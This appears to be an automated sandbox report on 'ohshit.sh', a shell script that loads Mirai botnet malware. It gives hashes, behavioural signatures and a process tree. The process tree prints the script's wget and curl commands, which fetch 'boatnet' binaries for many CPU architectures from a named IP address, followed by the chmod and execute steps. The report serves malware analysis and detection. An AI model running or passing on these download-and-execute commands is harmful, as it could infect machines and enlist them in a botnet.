Analysis
-
max time kernel
59s -
max time network
64s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
31-08-2024 21:05
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
debian12-armhf-20240418-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian12-mipsel-20240729-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral4
Sample
ohshit.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral5
Sample
ohshit.sh
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral6
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral7
Sample
ohshit.sh
Resource
ubuntu2004-amd64-20240729-en
Behavioral task
behavioral8
Sample
ohshit.sh
Resource
ubuntu2204-amd64-20240611-en
General
-
Target
ohshit.sh
-
Size
2KB
-
MD5
fefdf2b7ece4d55bd47778b420f84011
-
SHA1
2823096e0538910f9b57ff9bae007ec655520fc3
-
SHA256
3611c98f0a496d5891dc7888ed43a5d9b5eae8b1b27186dbe8b9b83922ae66eb
-
SHA512
b1e1c59a9802ea141e48f395d3f5268c351687e7ca8758feb9b6882d51f230be3c72f657219816c82fa61bd811ce37bfb392c0a26d10d5b53bb333e7af03cf21
Malware Config
Extracted
mirai
LZRD
Signatures
-
Executes dropped EXE 13 IoCs
ioc pid Process /tmp/WTF 1525 WTF /tmp/WTF 1534 WTF /tmp/WTF 1543 WTF /tmp/WTF 1552 WTF /tmp/WTF 1561 WTF /tmp/WTF 1603 WTF /tmp/WTF 1613 WTF /tmp/WTF 1629 WTF /tmp/WTF 1646 WTF /tmp/WTF 1671 WTF /tmp/WTF 1682 WTF /tmp/WTF 1692 WTF /tmp/WTF 1703 WTF -
Modifies Watchdog functionality 1 TTPs 26 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF -
resource yara_rule behavioral6/files/fstream-1.dat upx -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 1 TTPs 26 IoCs
description ioc Process File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/496/status WTF File opened for reading /proc/1265/status WTF File opened for reading /proc/1065/status WTF File opened for reading /proc/1586/status WTF File opened for reading /proc/1606/status WTF File opened for reading /proc/1597/status WTF File opened for reading /proc/174/status WTF File opened for reading /proc/1596/status WTF File opened for reading /proc/1042/status WTF File opened for reading /proc/426/status WTF File opened for reading /proc/1555/status WTF File opened for reading /proc/1184/status WTF File opened for reading /proc/1566/status WTF File opened for reading /proc/1055/status WTF File opened for reading /proc/1305/status WTF File opened for reading /proc/550/status WTF File opened for reading /proc/568/status WTF File opened for reading /proc/11/status WTF File opened for reading /proc/1116/status WTF File opened for reading /proc/1526/status WTF File opened for reading /proc/1666/status WTF File opened for reading /proc/31/status WTF File opened for reading /proc/137/status WTF File opened for reading /proc/1305/status WTF File opened for reading /proc/21/status WTF File opened for reading /proc/1614/status WTF File opened for reading /proc/13/status WTF File opened for reading /proc/1079/status WTF File opened for reading /proc/467/status WTF File opened for reading /proc/1653/status WTF File opened for reading /proc/1599/status WTF File opened for reading /proc/1526/status WTF File opened for reading /proc/1585/status WTF File opened for reading /proc/1623/status WTF File opened for reading /proc/497/status WTF File opened for reading /proc/1083/status WTF File opened for reading /proc/465/status WTF File opened for reading /proc/1604/status WTF File opened for reading /proc/1660/status WTF File opened for reading /proc/659/status WTF File opened for reading /proc/1132/status WTF File opened for reading /proc/20/status WTF File opened for reading /proc/15/status WTF File opened for reading /proc/25/status WTF File opened for reading /proc/1676/status WTF File opened for reading /proc/497/status WTF File opened for reading /proc/1079/status WTF File opened for reading /proc/1065/status WTF File opened for reading /proc/9/status WTF File opened for reading /proc/1486/status WTF File opened for reading /proc/467/status WTF File opened for reading /proc/1514/status WTF File opened for reading /proc/440/status WTF File opened for reading /proc/1528/status WTF File opened for reading /proc/1637/status WTF File opened for reading /proc/1618/status WTF File opened for reading /proc/19/status WTF File opened for reading /proc/1515/status WTF File opened for reading /proc/1544/status WTF File opened for reading /proc/1065/status WTF File opened for reading /proc/1143/status WTF File opened for reading /proc/323/status WTF File opened for reading /proc/1620/status WTF File opened for reading /proc/18/status WTF -
Writes file to tmp directory 27 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/WTF ohshit.sh File opened for modification /tmp/boatnet.i686 curl File opened for modification /tmp/boatnet.x86_64 wget File opened for modification /tmp/boatnet.arm6 curl File opened for modification /tmp/boatnet.spc curl File opened for modification /tmp/boatnet.x86_64 curl File opened for modification /tmp/boatnet.mpsl curl File opened for modification /tmp/boatnet.arm curl File opened for modification /tmp/boatnet.mpsl wget File opened for modification /tmp/boatnet.x86 wget File opened for modification /tmp/boatnet.mips wget File opened for modification /tmp/boatnet.arm7 wget File opened for modification /tmp/boatnet.m68k wget File opened for modification /tmp/boatnet.x86 curl File opened for modification /tmp/boatnet.mips curl File opened for modification /tmp/boatnet.arc wget File opened for modification /tmp/boatnet.arm6 wget File opened for modification /tmp/boatnet.spc wget File opened for modification /tmp/boatnet.arc curl File opened for modification /tmp/boatnet.i468 curl File opened for modification /tmp/boatnet.arm5 wget File opened for modification /tmp/boatnet.arm5 curl File opened for modification /tmp/boatnet.ppc wget File opened for modification /tmp/boatnet.ppc curl File opened for modification /tmp/boatnet.m68k curl File opened for modification /tmp/boatnet.arm wget File opened for modification /tmp/boatnet.arm7 curl
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
PID:1517 -
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:1518
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:1519
-
-
/bin/catcat boatnet.x862⤵PID:1523
-
-
/bin/chmodchmod +x boatnet.x86 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-DsKJWD WTF2⤵PID:1524
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1525
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.mips2⤵
- Writes file to tmp directory
PID:1529
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.mips2⤵
- Writes file to tmp directory
PID:1531
-
-
/bin/chmodchmod +x boatnet.mips boatnet.x86 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-DsKJWD WTF2⤵PID:1533
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1534
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:1538
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:1540
-
-
/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-DsKJWD WTF2⤵PID:1542
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1543
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.i4682⤵PID:1547
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.i4682⤵
- Writes file to tmp directory
PID:1549
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-DsKJWD WTF2⤵PID:1551
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1552
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.i6862⤵PID:1556
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.i6862⤵
- Writes file to tmp directory
PID:1558
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-DsKJWD WTF2⤵PID:1560
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1561
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.x86_642⤵
- Writes file to tmp directory
PID:1565
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.x86_642⤵
- Writes file to tmp directory
PID:1577
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF2⤵PID:1602
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1603
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:1607
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:1610
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF2⤵PID:1612
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1613
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:1617
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:1619
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF2⤵PID:1628
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1629
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
PID:1633
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
PID:1637
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF2⤵PID:1645
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1646
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
PID:1650
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
PID:1668
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF2⤵PID:1670
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1671
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
PID:1675
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
PID:1678
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF2⤵PID:1681
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1682
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.ppc2⤵
- Writes file to tmp directory
PID:1686
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.ppc2⤵
- Writes file to tmp directory
PID:1688
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF2⤵PID:1691
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1692
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
PID:1697
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
PID:1699
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF2⤵PID:1702
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1703
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.m68k2⤵
- Writes file to tmp directory
PID:1707
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.m68k2⤵
- Writes file to tmp directory
PID:1709
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5ba2cb5b8715ba94c39e24e75a34d0ea0
SHA17182bf3b0e14e5224e741c15174c6e93f00df444
SHA25601fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33
SHA5120c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d